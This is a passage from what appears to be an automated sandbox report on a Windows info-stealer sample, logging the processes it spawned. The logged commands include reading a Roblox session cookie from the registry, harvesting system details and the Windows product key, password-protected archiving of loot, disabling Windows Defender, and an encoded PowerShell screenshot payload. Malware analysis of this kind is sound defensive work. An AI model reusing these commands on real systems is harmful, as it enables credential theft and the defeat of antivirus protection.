ACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0DB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,84_2_00007FF71F0DB340
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644899570 cpuid 0_2_00007FF644899570
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
